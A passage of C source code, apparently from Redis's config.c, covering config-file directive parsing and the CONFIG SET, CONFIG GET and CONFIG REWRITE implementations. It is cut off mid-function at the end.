* remove it from the command table. */
retval = dictDelete(server.commands, argv[1]);
serverAssert(retval == DICT_OK);
/* Otherwise we re-add the command under a different name. */
if (sdslen(argv[2]) != 0) {
sds copy = sdsdup(argv[2]);
retval = dictAdd(server.commands, copy, cmd);
if (retval != DICT_OK) {
sdsfree(copy);
err = "Target command name already exists"; goto loaderr;
}
}
} else if (!strcasecmp(argv[0],"cluster-config-file") && argc == 2) {
zfree(server.cluster_configfile);
server.cluster_configfile = zstrdup(argv[1]);
} else if (!strcasecmp(argv[0],"client-output-buffer-limit") &&
argc == 5)
{
int class = getClientTypeByName(argv[1]);
unsigned long long hard, soft;
int soft_seconds;
if (class == -1 || class == CLIENT_TYPE_MASTER) {
err = "Unrecognized client limit class: the user specified "
"an invalid one, or 'master' which has no buffer limits.";
goto loaderr;
}
hard = memtoll(argv[2],NULL);
soft = memtoll(argv[3],NULL);
soft_seconds = atoi(argv[4]);
if (soft_seconds < 0) {
err = "Negative number of seconds in soft limit is invalid";
goto loaderr;
}
server.client_obuf_limits[class].hard_limit_bytes = hard;
server.client_obuf_limits[class].soft_limit_bytes = soft;
server.client_obuf_limits[class].soft_limit_seconds = soft_seconds;
} else if (!strcasecmp(argv[0],"oom-score-adj-values") && argc == 1 + CONFIG_OOM_COUNT) {
if (updateOOMScoreAdjValues(&argv[1], &err, 0) == C_ERR) goto loaderr;
} else if (!strcasecmp(argv[0],"notify-keyspace-events") && argc == 2) {
int flags = keyspaceEventsStringToFlags(argv[1]);
if (flags == -1) {
err = "Invalid event class character. Use 'g$lshzxeA'.";
goto loaderr;
}
server.notify_keyspace_events = flags;
} else if (!strcasecmp(argv[0],"user") && argc >= 2) {
int argc_err;
if (ACLAppendUserForLoading(argv,argc,&argc_err) == C_ERR) {
char buf[1024];
char *errmsg = ACLSetUserStringError();
snprintf(buf,sizeof(buf),"Error in user declaration '%s': %s",
argv[argc_err],errmsg);
err = buf;
goto loaderr;
}
} else if (!strcasecmp(argv[0],"loadmodule") && argc >= 2) {
queueLoadModule(argv[1],&argv[2],argc-2);
} else if (!strcasecmp(argv[0],"sentinel")) {
/* argc == 1 is handled by main() as we need to enter the sentinel
* mode ASAP. */
if (argc != 1) {
if (!server.sentinel_mode) {
err = "sentinel directive while not in sentinel mode";
goto loaderr;
}
err = sentinelHandleConfiguration(argv+1,argc-1);
if (err) goto loaderr;
}
} else {
err = "Bad directive or wrong number of arguments"; goto loaderr;
}
sdsfreesplitres(argv,argc);
}
/* Sanity checks. */
if (server.cluster_enabled && server.masterhost) {
linenum = slaveof_linenum;
i = linenum-1;
err = "replicaof directive not allowed in cluster mode";
goto loaderr;
}
sdsfreesplitres(lines,totlines);
return;
loaderr:
fprintf(stderr, "\n*** FATAL CONFIG FILE ERROR (Redis %s) ***\n",
REDIS_VERSION);
fprintf(stderr, "Reading the configuration file, at line %d\n", linenum);
fprintf(stderr, ">>> '%s'\n", lines[i]);
fprintf(stderr, "%s\n", err);
exit(1);
}
/* Load the server configuration from the specified filename.
* The function appends the additional configuration directives stored
* in the 'options' string to the config file before loading.
*
* Both filename and options can be NULL, in such a case are considered
* empty. This way loadServerConfig can be used to just load a file or
* just load a string. */
void loadServerConfig(char *filename, char *options) {
sds config = sdsempty();
char buf[CONFIG_MAX_LINE+1];
/* Load the file content */
if (filename) {
FILE *fp;
if (filename[0] == '-' && filename[1] == '\0') {
fp = stdin;
} else {
if ((fp = fopen(filename,"r")) == NULL) {
serverLog(LL_WARNING,
"Fatal error, can't open config file '%s': %s",
filename, strerror(errno));
exit(1);
}
}
while(fgets(buf,CONFIG_MAX_LINE+1,fp) != NULL)
config = sdscat(config,buf);
if (fp != stdin) fclose(fp);
}
/* Append the additional options */
if (options) {
config = sdscat(config,"\n");
config = sdscat(config,options);
}
loadServerConfigFromString(config);
sdsfree(config);
}
/*-----------------------------------------------------------------------------
* CONFIG SET implementation
*----------------------------------------------------------------------------*/
#define config_set_bool_field(_name,_var) \
} else if (!strcasecmp(c->argv[2]->ptr,_name)) { \
int yn = yesnotoi(o->ptr); \
if (yn == -1) goto badfmt; \
_var = yn;
#define config_set_numerical_field(_name,_var,min,max) \
} else if (!strcasecmp(c->argv[2]->ptr,_name)) { \
if (getLongLongFromObject(o,&ll) == C_ERR) goto badfmt; \
if (min != LLONG_MIN && ll < min) goto badfmt; \
if (max != LLONG_MAX && ll > max) goto badfmt; \
_var = ll;
#define config_set_memory_field(_name,_var) \
} else if (!strcasecmp(c->argv[2]->ptr,_name)) { \
ll = memtoll(o->ptr,&err); \
if (err || ll < 0) goto badfmt; \
_var = ll;
#define config_set_special_field(_name) \
} else if (!strcasecmp(c->argv[2]->ptr,_name)) {
#define config_set_special_field_with_alias(_name1,_name2) \
} else if (!strcasecmp(c->argv[2]->ptr,_name1) || \
!strcasecmp(c->argv[2]->ptr,_name2)) {
#define config_set_else } else
void configSetCommand(client *c) {
robj *o;
long long ll;
int err;
char *errstr = NULL;
serverAssertWithInfo(c,c->argv[2],sdsEncodedObject(c->argv[2]));
serverAssertWithInfo(c,c->argv[3],sdsEncodedObject(c->argv[3]));
o = c->argv[3];
/* Iterate the configs that are standard */
for (standardConfig *config = configs; config->name != NULL; config++) {
if(config->modifiable && (!strcasecmp(c->argv[2]->ptr,config->name) ||
(config->alias && !strcasecmp(c->argv[2]->ptr,config->alias))))
{
if (!config->interface.set(config->data,o->ptr,1,&errstr)) {
goto badfmt;
}
addReply(c,shared.ok);
return;
}
}
if (0) { /* this starts the config_set macros else-if chain. */
/* Special fields that can't be handled with general macros. */
config_set_special_field("requirepass") {
if (sdslen(o->ptr) > CONFIG_AUTHPASS_MAX_LEN) goto badfmt;
/* The old "requirepass" directive just translates to setting
* a password to the default user. The only thing we do
* additionally is to remember the cleartext password in this
* case, for backward compatibility with Redis <= 5. */
ACLSetUser(DefaultUser,"resetpass",-1);
sdsfree(server.requirepass);
server.requirepass = NULL;
if (sdslen(o->ptr)) {
sds aclop = sdscatprintf(sdsempty(),">%s",(char*)o->ptr);
ACLSetUser(DefaultUser,aclop,sdslen(aclop));
sdsfree(aclop);
server.requirepass = sdsnew(o->ptr);
} else {
ACLSetUser(DefaultUser,"nopass",-1);
}
} config_set_special_field("save") {
int vlen, j;
sds *v = sdssplitlen(o->ptr,sdslen(o->ptr)," ",1,&vlen);
/* Perform sanity check before setting the new config:
* - Even number of args
* - Seconds >= 1, changes >= 0 */
if (vlen & 1) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
for (j = 0; j < vlen; j++) {
char *eptr;
long val;
val = strtoll(v[j], &eptr, 10);
if (eptr[0] != '\0' ||
((j & 1) == 0 && val < 1) ||
((j & 1) == 1 && val < 0)) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
}
/* Finally set the new config */
resetServerSaveParams();
for (j = 0; j < vlen; j += 2) {
time_t seconds;
int changes;
seconds = strtoll(v[j],NULL,10);
changes = strtoll(v[j+1],NULL,10);
appendServerSaveParams(seconds, changes);
}
sdsfreesplitres(v,vlen);
} config_set_special_field("dir") {
if (chdir((char*)o->ptr) == -1) {
addReplyErrorFormat(c,"Changing directory: %s", strerror(errno));
return;
}
} config_set_special_field("client-output-buffer-limit") {
int vlen, j;
sds *v = sdssplitlen(o->ptr,sdslen(o->ptr)," ",1,&vlen);
/* We need a multiple of 4: <class> <hard> <soft> <soft_seconds> */
if (vlen % 4) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
/* Sanity check of single arguments, so that we either refuse the
* whole configuration string or accept it all, even if a single
* error in a single client class is present. */
for (j = 0; j < vlen; j++) {
long val;
if ((j % 4) == 0) {
int class = getClientTypeByName(v[j]);
if (class == -1 || class == CLIENT_TYPE_MASTER) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
} else {
val = memtoll(v[j], &err);
if (err || val < 0) {
sdsfreesplitres(v,vlen);
goto badfmt;
}
}
}
/* Finally set the new config */
for (j = 0; j < vlen; j += 4) {
int class;
unsigned long long hard, soft;
int soft_seconds;
class = getClientTypeByName(v[j]);
hard = memtoll(v[j+1],NULL);
soft = memtoll(v[j+2],NULL);
soft_seconds = strtoll(v[j+3],NULL,10);
server.client_obuf_limits[class].hard_limit_bytes = hard;
server.client_obuf_limits[class].soft_limit_bytes = soft;
server.client_obuf_limits[class].soft_limit_seconds = soft_seconds;
}
sdsfreesplitres(v,vlen);
} config_set_special_field("oom-score-adj-values") {
int vlen;
int success = 1;
sds *v = sdssplitlen(o->ptr, sdslen(o->ptr), " ", 1, &vlen);
if (vlen != CONFIG_OOM_COUNT || updateOOMScoreAdjValues(v, &errstr, 1) == C_ERR)
success = 0;
sdsfreesplitres(v, vlen);
if (!success)
goto badfmt;
} config_set_special_field("notify-keyspace-events") {
int flags = keyspaceEventsStringToFlags(o->ptr);
if (flags == -1) goto badfmt;
server.notify_keyspace_events = flags;
/* Numerical fields.
* config_set_numerical_field(name,var,min,max) */
} config_set_numerical_field(
"watchdog-period",ll,0,INT_MAX) {
if (ll)
enableWatchdog(ll);
else
disableWatchdog();
/* Memory fields.
* config_set_memory_field(name,var) */
} config_set_memory_field(
"client-query-buffer-limit",server.client_max_querybuf_len) {
/* Everything else is an error... */
} config_set_else {
addReplyErrorFormat(c,"Unsupported CONFIG parameter: %s",
(char*)c->argv[2]->ptr);
return;
}
/* On success we just return a generic OK for all the options. */
addReply(c,shared.ok);
return;
badfmt: /* Bad format errors */
if (errstr) {
addReplyErrorFormat(c,"Invalid argument '%s' for CONFIG SET '%s' - %s",
(char*)o->ptr,
(char*)c->argv[2]->ptr,
errstr);
} else {
addReplyErrorFormat(c,"Invalid argument '%s' for CONFIG SET '%s'",
(char*)o->ptr,
(char*)c->argv[2]->ptr);
}
}
/*-----------------------------------------------------------------------------
* CONFIG GET implementation
*----------------------------------------------------------------------------*/
#define config_get_string_field(_name,_var) do { \
if (stringmatch(pattern,_name,1)) { \
addReplyBulkCString(c,_name); \
addReplyBulkCString(c,_var ? _var : ""); \
matches++; \
} \
} while(0);
#define config_get_bool_field(_name,_var) do { \
if (stringmatch(pattern,_name,1)) { \
addReplyBulkCString(c,_name); \
addReplyBulkCString(c,_var ? "yes" : "no"); \
matches++; \
} \
} while(0);
#define config_get_numerical_field(_name,_var) do { \
if (stringmatch(pattern,_name,1)) { \
ll2string(buf,sizeof(buf),_var); \
addReplyBulkCString(c,_name); \
addReplyBulkCString(c,buf); \
matches++; \
} \
} while(0);
void configGetCommand(client *c) {
robj *o = c->argv[2];
void *replylen = addReplyDeferredLen(c);
char *pattern = o->ptr;
char buf[128];
int matches = 0;
serverAssertWithInfo(c,o,sdsEncodedObject(o));
/* Iterate the configs that are standard */
for (standardConfig *config = configs; config->name != NULL; config++) {
if (stringmatch(pattern,config->name,1)) {
addReplyBulkCString(c,config->name);
config->interface.get(c,config->data);
matches++;
}
if (config->alias && stringmatch(pattern,config->alias,1)) {
addReplyBulkCString(c,config->alias);
config->interface.get(c,config->data);
matches++;
}
}
/* String values */
config_get_string_field("logfile",server.logfile);
/* Numerical values */
config_get_numerical_field("client-query-buffer-limit",server.client_max_querybuf_len);
config_get_numerical_field("watchdog-period",server.watchdog_period);
/* Everything we can't handle with macros follows. */
if (stringmatch(pattern,"dir",1)) {
char buf[1024];
if (getcwd(buf,sizeof(buf)) == NULL)
buf[0] = '\0';
addReplyBulkCString(c,"dir");
addReplyBulkCString(c,buf);
matches++;
}
if (stringmatch(pattern,"save",1)) {
sds buf = sdsempty();
int j;
for (j = 0; j < server.saveparamslen; j++) {
buf = sdscatprintf(buf,"%jd %d",
(intmax_t)server.saveparams[j].seconds,
server.saveparams[j].changes);
if (j != server.saveparamslen-1)
buf = sdscatlen(buf," ",1);
}
addReplyBulkCString(c,"save");
addReplyBulkCString(c,buf);
sdsfree(buf);
matches++;
}
if (stringmatch(pattern,"client-output-buffer-limit",1)) {
sds buf = sdsempty();
int j;
for (j = 0; j < CLIENT_TYPE_OBUF_COUNT; j++) {
buf = sdscatprintf(buf,"%s %llu %llu %ld",
getClientTypeName(j),
server.client_obuf_limits[j].hard_limit_bytes,
server.client_obuf_limits[j].soft_limit_bytes,
(long) server.client_obuf_limits[j].soft_limit_seconds);
if (j != CLIENT_TYPE_OBUF_COUNT-1)
buf = sdscatlen(buf," ",1);
}
addReplyBulkCString(c,"client-output-buffer-limit");
addReplyBulkCString(c,buf);
sdsfree(buf);
matches++;
}
if (stringmatch(pattern,"unixsocketperm",1)) {
char buf[32];
snprintf(buf,sizeof(buf),"%o",server.unixsocketperm);
addReplyBulkCString(c,"unixsocketperm");
addReplyBulkCString(c,buf);
matches++;
}
if (stringmatch(pattern,"slaveof",1) ||
stringmatch(pattern,"replicaof",1))
{
char *optname = stringmatch(pattern,"slaveof",1) ?
"slaveof" : "replicaof";
char buf[256];
addReplyBulkCString(c,optname);
if (server.masterhost)
snprintf(buf,sizeof(buf),"%s %d",
server.masterhost, server.masterport);
else
buf[0] = '\0';
addReplyBulkCString(c,buf);
matches++;
}
if (stringmatch(pattern,"notify-keyspace-events",1)) {
sds flags = keyspaceEventsFlagsToString(server.notify_keyspace_events);
addReplyBulkCString(c,"notify-keyspace-events");
addReplyBulkSds(c,flags);
matches++;
}
if (stringmatch(pattern,"bind",1)) {
sds aux = sdsjoin(server.bindaddr,server.bindaddr_count," ");
addReplyBulkCString(c,"bind");
addReplyBulkCString(c,aux);
sdsfree(aux);
matches++;
}
if (stringmatch(pattern,"requirepass",1)) {
addReplyBulkCString(c,"requirepass");
sds password = server.requirepass;
if (password) {
addReplyBulkCBuffer(c,password,sdslen(password));
} else {
addReplyBulkCString(c,"");
}
matches++;
}
if (stringmatch(pattern,"oom-score-adj-values",0)) {
sds buf = sdsempty();
int j;
for (j = 0; j < CONFIG_OOM_COUNT; j++) {
buf = sdscatprintf(buf,"%d", server.oom_score_adj_values[j]);
if (j != CONFIG_OOM_COUNT-1)
buf = sdscatlen(buf," ",1);
}
addReplyBulkCString(c,"oom-score-adj-values");
addReplyBulkCString(c,buf);
sdsfree(buf);
matches++;
}
setDeferredMapLen(c,replylen,matches);
}
/*-----------------------------------------------------------------------------
* CONFIG REWRITE implementation
*----------------------------------------------------------------------------*/
#define REDIS_CONFIG_REWRITE_SIGNATURE "# Generated by CONFIG REWRITE"
/* We use the following dictionary type to store where a configuration
* option is mentioned in the old configuration file, so it's
* like "maxmemory" -> list of line numbers (first line is zero). */
uint64_t dictSdsCaseHash(const void *key);
int dictSdsKeyCaseCompare(void *privdata, const void *key1, const void *key2);
void dictSdsDestructor(void *privdata, void *val);
void dictListDestructor(void *privdata, void *val);
/* Sentinel config rewriting is implemented inside sentinel.c by
* rewriteConfigSentinelOption(). */
void rewriteConfigSentinelOption(struct rewriteConfigState *state);
dictType optionToLineDictType = {
dictSdsCaseHash, /* hash function */
NULL, /* key dup */
NULL, /* val dup */
dictSdsKeyCaseCompare, /* key compare */
dictSdsDestructor, /* key destructor */
dictListDestructor /* val destructor */
};
dictType optionSetDictType = {
dictSdsCaseHash, /* hash function */
NULL, /* key dup */
NULL, /* val dup */
dictSdsKeyCaseCompare, /* key compare */
dictSdsDestructor, /* key destructor */
NULL /* val destructor */
};
/* The config rewrite state. */
struct rewriteConfigState {
dict *option_to_line; /* Option -> list of config file lines map */
dict *rewritten; /* Dictionary of already processed options */
int numlines; /* Number of lines in current config */
sds *lines; /* Current lines as an array of sds strings */
int has_tail; /* True if we already added directives that were
not present in the original config file. */
int force_all; /* True if we want all keywords to be force
written. Currently only used for testing. */
};
/* Append the new line to the current configuration state. */
void rewriteConfigAppendLine(struct rewriteConfigState *state, sds line) {
state->lines = zrealloc(state->lines, sizeof(char*) * (state->numlines+1));
state->lines[state->numlines++] = line;
}
/* Populate the option -> list of line numbers map. */
void rewriteConfigAddLineNumberToOption(struct rewriteConfigState *state, sds option, int linenum) {
list *l = dictFetchValue(state->option_to_line,option);
if (l == NULL) {
l = listCreate();
dictAdd(state->option_to_line,sdsdup(option),l);
}
listAddNodeTail(l,(void*)(long)linenum);
}
/* Add the specified option to the set of processed options.
* This is useful as only unused lines of processed options will be blanked
* in the config file, while options the rewrite process does not understand
* remain untouched. */
void rewriteConfigMarkAsProcessed(struct rewriteConfigState *state, const char *option) {
sds opt = sdsnew(option);
if (dictAdd(state->rewritten,opt,NULL) != DICT_OK) sdsfree(opt);
}
/* Read the old file, split it into lines to populate a newly created
* config rewrite state, and return it to the caller.
*
* If it is impossible to read the old file, NULL is returned.
* If the old file does not exist at all, an empty state is returned. */
struct rewriteConfigState *rewriteConfigReadOldFile(char *path) {
FILE *fp = fopen(path,"r");
if (fp == NULL && errno != ENOENT) return NULL;
char buf[CONFIG_MAX_LINE+1];
int linenum = -1;
struct rewriteConfigState *state = zmalloc(sizeof(*state));
state->option_to_line = dictCreate(&optionToLineDictType,NULL);
state->rewritten = dictCreate(&optionSetDictType,NULL);
state->numlines = 0;
state->lines = NULL;
state->has_tail = 0;
state->force_all = 0;
if (fp == NULL) return state;
/* Read the old file line by line, populate the state. */
while(fgets(buf,CONFIG_MAX_LINE+1,fp) != NULL) {
int argc;
sds *argv;
sds line = sdstrim(sdsnew(buf),"\r\n\t ");
linenum++; /* Zero based, so we init at -1 */
/* Handle comments and empty lines. */
if (line[0] == '#' || line[0] == '\0') {
if (!state->has_tail && !strcmp(line,REDIS_CONFIG_REWRITE_SIGNATURE))
state->has_tail = 1;
rewriteConfigAppendLine(state,line);
continue;
}
/* Not a comment, split into arguments. */
argv = sdssplitargs(line,&argc);
if (argv == NULL) {
/* Apparently the line is unparsable for some reason, for
* instance it may have unbalanced quotes. Load it as a
* comment. */
sds aux = sdsnew("# ??? ");
aux = sdscatsds(aux,line);
sdsfree(line);
rewriteConfigAppendLine(state,aux);
continue;
}
sdstolower(argv[0]); /* We only want lowercase config directives. */
/* Now we populate the state according to the content of this line.
* Append the line and populate the option -> line numbers map. */
rewriteConfigAppendLine(state,line);
/* Translate options using the word "slave" to the corresponding name
* "replica", before adding such option to the config name -> lines
* mapping. */
char *p = strstr(argv[0],"slave");
if (p) {
sds alt = sdsempty();
alt = sdscatlen(alt,argv[0],p-argv[0]);;
alt = sdscatlen(alt,"replica",7);
alt = sdscatlen(alt,p+5,strlen(p+5));
sdsfree(argv[0]);
argv[0] = alt;
}
rewriteConfigAddLineNumberToOption(state,argv[0],linenum);
sdsfreesplitres(argv,argc);
}
fclose(fp);
return state;
}
/* Rewrite the specified configuration option with the new "line".
* It progressively uses lines of the file that were already used for the same
* configuration option in the old version of the file, removing that line from
* the map of options -> line numbers.
*
* If there are lines associated with a given configuration option and
* "force" is non-zero, the line is appended to the configuration file.
* Usually "force" is true when an option has not its default value, so it
* must be rewritten even if not present previously.
*
* The first time a line is appended into a configuration file, a comment
* is added to show that starting from that point the config file was generated
* by CONFIG REWRITE.
*
* "line" is either used, or freed, so the caller does not need to free it
* in any way. */
void rewriteConfigRewriteLine(struct rewriteConfigState *state, const char *option, sds line, int force) {
sds o = sdsnew(option);
list *l = dictFetchValue(state->option_to_line,o);
rewriteConfigMarkAsProcessed(state,option);
if (!l && !force && !state->force_all) {
/* Option not used previously, and we are not forced to use it. */
sdsfree(line);
sdsfree(o);
return;
}
if (l) {
listNode *ln = listFirst(l);
int linenum = (long) ln->value;
/* There are still lines in the old configuration file we can reuse
* for this option. Replace the line with the new one. */
listDelNode(l,ln);
if (listLength(l) == 0) dictDelete(state->option_to_line,o);
sdsfree(state->lines[linenum]);
state->lines[linenum] = line;
} else {
/* Append a new line. */
if (!state->has_tail) {
rewriteConfigAppendLine(state,
sdsnew(REDIS_CONFIG_REWRITE_SIGNATURE));
state->has_tail = 1;
}
rewriteConfigAppendLine(state,line);
}
sdsfree(o);
}
/* Write the long long 'bytes' value as a string in a way that is parsable
* inside redis.conf. If possible uses the GB, MB, KB notation. */
int rewriteConfigFormatMemory(char *buf, size_t len, long long bytes) {
int gb = 1024*1024*1024;
int mb = 1024*1024;
int kb = 1024;
if (bytes && (bytes % gb) == 0) {
return snprintf(buf,len,"%lldgb",bytes/gb);
} else if (bytes && (bytes % mb) == 0) {
return snprintf(buf,len,"%lldmb",bytes/mb);
} else if (bytes && (bytes % kb) == 0) {
return snprintf(buf,len,"%lldkb",bytes/kb);
} else {
return snprintf(buf,len,"%lld",bytes);
}
}
/* Rewrite a simple "option-name <bytes>" configuration option. */
void rewriteConfigBytesOption(struct rewriteConfigState *state, const char *option, long long value, long long defvalue) {
char buf[64];
int force = value != defvalue;
sds line;
rewriteConfigFormatMemory(buf,sizeof(buf),value);
line = sdscatprintf(sdsempty(),"%s %s",option,buf);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite a yes/no option. */
void rewriteConfigYesNoOption(struct rewriteConfigState *state, const char *option, int value, int defvalue) {
int force = value != defvalue;
sds line = sdscatprintf(sdsempty(),"%s %s",option,
value ? "yes" : "no");
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite a string option. */
void rewriteConfigStringOption(struct rewriteConfigState *state, const char *option, char *value, const char *defvalue) {
int force = 1;
sds line;
/* String options set to NULL need to be not present at all in the
* configuration file to be set to NULL again at the next reboot. */
if (value == NULL) {
rewriteConfigMarkAsProcessed(state,option);
return;
}
/* Set force to zero if the value is set to its default. */
if (defvalue && strcmp(value,defvalue) == 0) force = 0;
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
line = sdscatrepr(line, value, strlen(value));
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite a numerical (long long range) option. */
void rewriteConfigNumericalOption(struct rewriteConfigState *state, const char *option, long long value, long long defvalue) {
int force = value != defvalue;
sds line = sdscatprintf(sdsempty(),"%s %lld",option,value);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite an octal option. */
void rewriteConfigOctalOption(struct rewriteConfigState *state, char *option, int value, int defvalue) {
int force = value != defvalue;
sds line = sdscatprintf(sdsempty(),"%s %o",option,value);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite an enumeration option. It takes as usually state and option name,
* and in addition the enumeration array and the default value for the
* option. */
void rewriteConfigEnumOption(struct rewriteConfigState *state, const char *option, int value, configEnum *ce, int defval) {
sds line;
const char *name = configEnumGetNameOrUnknown(ce,value);
int force = value != defval;
line = sdscatprintf(sdsempty(),"%s %s",option,name);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite the save option. */
void rewriteConfigSaveOption(struct rewriteConfigState *state) {
int j;
sds line;
/* In Sentinel mode we don't need to rewrite the save parameters */
if (server.sentinel_mode) {
rewriteConfigMarkAsProcessed(state,"save");
return;
}
/* Note that if there are no save parameters at all, all the current
* config line with "save" will be detected as orphaned and deleted,
* resulting into no RDB persistence as expected. */
for (j = 0; j < server.saveparamslen; j++) {
line = sdscatprintf(sdsempty(),"save %ld %d",
(long) server.saveparams[j].seconds, server.saveparams[j].changes);
rewriteConfigRewriteLine(state,"save",line,1);
}
/* Mark "save" as processed in case server.saveparamslen is zero. */
rewriteConfigMarkAsProcessed(state,"save");
}
/* Rewrite the user option. */
void rewriteConfigUserOption(struct rewriteConfigState *state) {
/* If there is a user file defined we just mark this configuration
* directive as processed, so that all the lines containing users
* inside the config file gets discarded. */
if (server.acl_filename[0] != '\0') {
rewriteConfigMarkAsProcessed(state,"user");
return;
}
/* Otherwise scan the list of users and rewrite every line. Note that
* in case the list here is empty, the effect will just be to comment
* all the users directive inside the config file. */
raxIterator ri;
raxStart(&ri,Users);
raxSeek(&ri,"^",NULL,0);
while(raxNext(&ri)) {
user *u = ri.data;
sds line = sdsnew("user ");
line = sdscatsds(line,u->name);
line = sdscatlen(line," ",1);
sds descr = ACLDescribeUser(u);
line = sdscatsds(line,descr);
sdsfree(descr);
rewriteConfigRewriteLine(state,"user",line,1);
}
raxStop(&ri);
/* Mark "user" as processed in case there are no defined users. */
rewriteConfigMarkAsProcessed(state,"user");
}
/* Rewrite the dir option, always using absolute paths.*/
void rewriteConfigDirOption(struct rewriteConfigState *state) {
char cwd[1024];
if (getcwd(cwd,sizeof(cwd)) == NULL) {
rewriteConfigMarkAsProcessed(state,"dir");
return; /* no rewrite on error. */
}
rewriteConfigStringOption(state,"dir",cwd,NULL);
}
/* Rewrite the slaveof option. */
void rewriteConfigSlaveofOption(struct rewriteConfigState *state, char *option) {
sds line;
/* If this is a master, we want all the slaveof config options
* in the file to be removed. Note that if this is a cluster instance
* we don't want a slaveof directive inside redis.conf. */
if (server.cluster_enabled || server.masterhost == NULL) {
rewriteConfigMarkAsProcessed(state,option);
return;
}
line = sdscatprintf(sdsempty(),"%s %s %d", option,
server.masterhost, server.masterport);
rewriteConfigRewriteLine(state,option,line,1);
}
/* Rewrite the notify-keyspace-events option. */
void rewriteConfigNotifykeyspaceeventsOption(struct rewriteConfigState *state) {
int force = server.notify_keyspace_events != 0;
char *option = "notify-keyspace-events";
sds line, flags;
flags = keyspaceEventsFlagsToString(server.notify_keyspace_events);
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
line = sdscatrepr(line, flags, sdslen(flags));
sdsfree(flags);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite the client-output-buffer-limit option. */
void rewriteConfigClientoutputbufferlimitOption(struct rewriteConfigState *state) {
int j;
char *option = "client-output-buffer-limit";
for (j = 0; j < CLIENT_TYPE_OBUF_COUNT; j++) {
int force = (server.client_obuf_limits[j].hard_limit_bytes !=
clientBufferLimitsDefaults[j].hard_limit_bytes) ||
(server.client_obuf_limits[j].soft_limit_bytes !=
clientBufferLimitsDefaults[j].soft_limit_bytes) ||
(server.client_obuf_limits[j].soft_limit_seconds !=
clientBufferLimitsDefaults[j].soft_limit_seconds);
sds line;
char hard[64], soft[64];
rewriteConfigFormatMemory(hard,sizeof(hard),
server.client_obuf_limits[j].hard_limit_bytes);
rewriteConfigFormatMemory(soft,sizeof(soft),
server.client_obuf_limits[j].soft_limit_bytes);
char *typename = getClientTypeName(j);
if (!strcmp(typename,"slave")) typename = "replica";
line = sdscatprintf(sdsempty(),"%s %s %s %s %ld",
option, typename, hard, soft,
(long) server.client_obuf_limits[j].soft_limit_seconds);
rewriteConfigRewriteLine(state,option,line,force);
}
}
/* Rewrite the oom-score-adj-values option. */
void rewriteConfigOOMScoreAdjValuesOption(struct rewriteConfigState *state) {
int force = 0;
int j;
char *option = "oom-score-adj-values";
sds line;
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
for (j = 0; j < CONFIG_OOM_COUNT; j++) {
if (server.oom_score_adj_values[j] != configOOMScoreAdjValuesDefaults[j])
force = 1;
line = sdscatprintf(line, "%d", server.oom_score_adj_values[j]);
if (j+1 != CONFIG_OOM_COUNT)
line = sdscatlen(line, " ", 1);
}
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite the bind option. */
void rewriteConfigBindOption(struct rewriteConfigState *state) {
int force = 1;
sds line, addresses;
char *option = "bind";
/* Nothing to rewrite if we don't have bind addresses. */
if (server.bindaddr_count == 0) {
rewriteConfigMarkAsProcessed(state,option);
return;
}
/* Rewrite as bind <addr1> <addr2> ... <addrN> */
addresses = sdsjoin(server.bindaddr,server.bindaddr_count," ");
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
line = sdscatsds(line, addresses);
sdsfree(addresses);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite the requirepass option. */
void rewriteConfigRequirepassOption(struct rewriteConfigState *state, char *option) {
int force = 1;
sds line;
sds password = server.requirepass;
/* If there is no password set, we don't want the requirepass option
* to be present in the configuration at all. */
if (password == NULL) {
rewriteConfigMarkAsProcessed(state,option);
return;
}
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
line = sdscatsds(line, password);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Glue together the configuration lines in the current configuration
* rewrite state into a single string, stripping multiple empty lines. */
sds rewriteConfigGetContentFromState(struct rewriteConfigState *state) {
sds content = sdsempty();
int j, was_empty = 0;
for (j = 0; j < state->numlines; j++) {
/* Every cluster of empty lines is turned into a single empty line. */
if (sdslen(state->lines[j]) == 0) {
if (was_empty) continue;
was_empty = 1;
} else {
was_empty = 0;
}
content = sdscatsds(content,state->lines[j]);
content = sdscatlen(content,"\n",1);
}
return content;
}
/* Free the configuration rewrite state. */
void rewriteConfigReleaseState(struct rewriteConfigState *state) {
sdsfreesplitres(state->lines,state->numlines);
dictRelease(state->option_to_line);
dictRelease(state->rewritten);
zfree(state);
}
/* At the end of the rewrite process the state contains the remaining
* map between "option name" => "lines in the original config file".
* Lines used by the rewrite process were removed by the function
* rewriteConfigRewriteLine(), all the other lines are "orphaned" and
* should be replaced by empty lines.
*
* This function does just this, iterating all the option names and
* blanking all the lines still associated. */
void rewriteConfigRemoveOrphaned(struct rewriteConfigState *state) {
dictIterator *di = dictGetIterator(state->option_to_line);
dictEntry *de;
while((de = dictNext(di)) != NULL) {
list *l = dictGetVal(de);
sds option = dictGetKey(de);
/* Don't blank lines about options the rewrite process
* don't understand. */
if (dictFind(state->rewritten,option) == NULL) {
serverLog(LL_DEBUG,"Not rewritten option: %s", option);
continue;
}
while(listLength(l)) {
listNode *ln = listFirst(l);
int linenum = (long) ln->value;
sdsfree(state->lines[linenum]);
state->lines[linenum] = sdsempty();
listDelNode(l,ln);
}
}
dictReleaseIterator(di);
}
/* This function replaces the old configuration file with the new content
* in an atomic manner.
*
* The function returns 0 on success, otherwise -1 is returned and errno
* is set accordingly. */
int rewriteConfigOverwriteFile(char *configfile, sds content) {
int fd = -1;
int retval = -1;
char tmp_conffile[PATH_MAX];
const char *tmp_suffix = ".XXXXXX";
size_t offset = 0;
ssize_t written_bytes = 0;
int tmp_path_len = snprintf(tmp_conffile, sizeof(tmp_conffile), "%s%s", configfile, tmp_suffix);
